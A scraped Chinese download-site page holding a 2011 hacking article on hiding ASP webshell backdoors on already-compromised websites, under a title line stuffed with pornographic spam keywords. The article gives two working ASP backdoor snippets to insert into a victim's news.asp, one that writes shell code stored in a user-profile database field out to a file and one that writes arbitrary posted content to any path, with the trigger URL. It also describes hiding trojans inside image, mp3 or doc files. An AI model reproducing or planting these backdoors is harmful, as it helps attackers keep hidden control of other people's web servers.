日本好好热aⅴ|国产99视频精品免费观看|日本成人aV在线|久热香蕉国产在线

• 電腦軟件
• 單機(jī)游戲
• 安卓應(yīng)用
• 安卓游戲
• 蘋果電腦
• 蘋果手機(jī)

軟件

軟件

文章

搜索

首頁 → 安全中心 → 數(shù)據(jù)庫安全 → 巧用.mdb后綴數(shù)據(jù)庫做后門的代碼

巧用.mdb后綴數(shù)據(jù)庫做后門的代碼

相關(guān)軟件相關(guān)文章發(fā)表評(píng)論 來源：西西整理時(shí)間：2011/8/1 13:45:50字體大�。�A-A+

作者：西西點(diǎn)擊：47次評(píng)論：0次標(biāo)簽： 數(shù)據(jù)庫

ACCESS 2007(使用簡單的數(shù)據(jù)庫軟件)精簡綠色中文版

• 類型：辦公軟件大�。�35KB語言：中文 評(píng)分：1.2
• 標(biāo)簽：

立即下載

 我不否認(rèn)n早前的那個(gè)把a(bǔ)sp木馬寫到圖片文件中不失為一種好的方法，其實(shí)不僅可以寫到圖片啦 寫到mp3文件里寫到doc文件里都是可以的啦
copy 文件名/參數(shù) + 文件名/參數(shù) 生成文件名
這樣的方法可以很靈活的運(yùn)用來達(dá)到隱藏文件的目的，具體的參數(shù)就是/a以acsic碼方式，/b二進(jìn)制方式，就不羅嗦這些了，至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴。mdb的數(shù)據(jù)庫中，前提是在我們拿到
一個(gè)webshell之后…
我們所知道的，很多站點(diǎn)在用戶注冊(cè)的時(shí)候要讓填好多東西例如：
用戶名、密碼、qq、郵箱、個(gè)人簡介、電話、聯(lián)系方式、住址一類的
而對(duì)應(yīng)到數(shù)據(jù)庫中也都會(huì)有相應(yīng)的表 字段 值
我今天要做的就是 我注冊(cè)一個(gè)用戶在 我的個(gè)人簡介的地方上寫入shell代碼，然后修改他站點(diǎn)上的一個(gè)文件，使用的時(shí)候觸發(fā)這個(gè)文件，就把我個(gè)人簡歷中的shell代碼，備份到當(dāng)前目錄下
廢話少說了 大家看代碼
<%
if request（“action”）=“firefox” then
fname=request.querystring（“fn”）
tname=request.querystring（“tn”）
bname=request.querystring（“bn”）
id=request.querystring（“id”）
idvalue=request.querystring（“idv”）
set rs=server.createobject（“ADODB.recordset”）
sql=“select ”& bname & “ from ”&tname& “ where ”&id&“=”&idvalue&“”“”
rs.open sql,conn,1,3
if not rs.eof then
content=rs（bname）
else
response.write “Nothing”
end if
set fso=Server.CreateObject（“Scripting.FileSystemObject”）
set txtfile=fso.createtextfile（server.mappath（fname））
txtfile.writeline（content）
txtfile.close
end if
%>
將上邊的代碼加到站點(diǎn)的一個(gè)文件中 如news.asp
根據(jù)我們了解的信息 在其站點(diǎn)注冊(cè)后 下載數(shù)據(jù)庫看結(jié)構(gòu)
我注冊(cè)的firefox名字是在 user表 其id值為119 用于存放我注冊(cè)簡歷的表字段為jl
那么在使用的時(shí)候我們
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
就可以在news.asp相同目錄下寫入一個(gè)名為 firefox.asp的webshell
以上可以說是萬千隱藏方法中的一種 下邊再說另外一種更方便的隱藏方法
這個(gè)方法就和mdb后綴無關(guān)系了
同樣我們還是修改news.asp 將以下代碼插入到對(duì)方news.asp中
<%
if request（“action”）=“firefox” then
n=request.form（“n”）
c=request.form（“c”）
set fso=Server.CreateObject（“Scripting.FileSystemObject”）
set txtfile=fso.createtextfile（server.mappath（n））
txtfile.writeline（c）
txtfile.close
end if
%>
這段代碼相對(duì)簡單些 算是一個(gè)木馬的服務(wù)端吧。引言：好長時(shí)間了，從剛開始的站點(diǎn)管理器到現(xiàn)在流行的幾款asp后門，相信大多網(wǎng)管都能說出這些經(jīng)典webshell的名字，如海洋、老兵、藍(lán)屏等，也相信大多數(shù)的網(wǎng)管學(xué)會(huì)了關(guān)鍵字的搜索方法來搜索這些木馬，當(dāng)然現(xiàn)在的時(shí)間如果再象隱藏后門就要講些技巧啦，俗話說的好“佛高一尺，我高一丈”。

相關(guān)文章

10-20SQL Server 2005 自動(dòng)備份數(shù)據(jù)庫 維護(hù)計(jì)劃實(shí)現(xiàn)數(shù)據(jù)庫定時(shí)自動(dòng)備份

09-24mssql數(shù)據(jù)庫沒有了SA密碼 無法Windows集成身份登錄解決方案

09-17MSSQL如何讓用戶只能訪問特定的數(shù)據(jù)庫

09-14Oracle數(shù)據(jù)庫該如何著手優(yōu)化一個(gè)SQL

06-09phpmyadmin 數(shù)據(jù)庫導(dǎo)入2048kb的解決辦法

05-28網(wǎng)曝?cái)y程網(wǎng)遭遇不明攻擊 數(shù)據(jù)庫全線崩潰：數(shù)據(jù)全被刪

02-03Phpmyadmin建立數(shù)據(jù)庫\用戶名\用戶權(quán)限分配 數(shù)據(jù)庫的導(dǎo)出與導(dǎo)入教

02-03SQLSERVER 2005數(shù)據(jù)庫備份、還原及數(shù)據(jù)恢復(fù)圖文教程

01-29阿里云服務(wù)器年終特惠6折瘋搶–1GB方案月付37元且送云數(shù)據(jù)庫

01-29VPS主機(jī)使用AMH面板修改MySQL默認(rèn)數(shù)據(jù)庫存放路徑

相關(guān)評(píng)論

閱讀本文后您有什么感想? 已有23人給出評(píng)價(jià)!

• 8 喜歡
• 3 頂
• 1 難過
• 5 囧
• 3 圍觀
• 2 無聊

熱門評(píng)論

最新評(píng)論

發(fā)表評(píng)論 查看所有評(píng)論(0)

昵稱:

表情:

字?jǐn)?shù): 0/500 (您的評(píng)論需要經(jīng)過審核才能顯示)

推薦文章

沒有數(shù)據(jù)

沒有數(shù)據(jù)

相關(guān)下載

名稱大小下載

• 1ACCESS 2007(使用簡單的數(shù)據(jù)庫軟件)35KB下載
• 2access mdb數(shù)據(jù)庫簡易編輯器1.0M下載
• 3Access 數(shù)據(jù)庫啟動(dòng)項(xiàng)設(shè)置工具30KB下載
• 4AccessDatabaseEngine.exe 64位版 數(shù)據(jù)庫訪問組件27.7M下載
• 5Access數(shù)據(jù)庫查詢分析器521KB下載
• 6Access數(shù)據(jù)庫管理器429KB下載
• 7Access數(shù)據(jù)庫密碼查看工具18KB下載
• 8access數(shù)據(jù)庫密碼查看器781KB下載
• 9Access數(shù)據(jù)庫批量導(dǎo)出Excel文件7KB下載
• 10ACCESS數(shù)據(jù)庫批量解密56KB下載

最新文章

沒有數(shù)據(jù)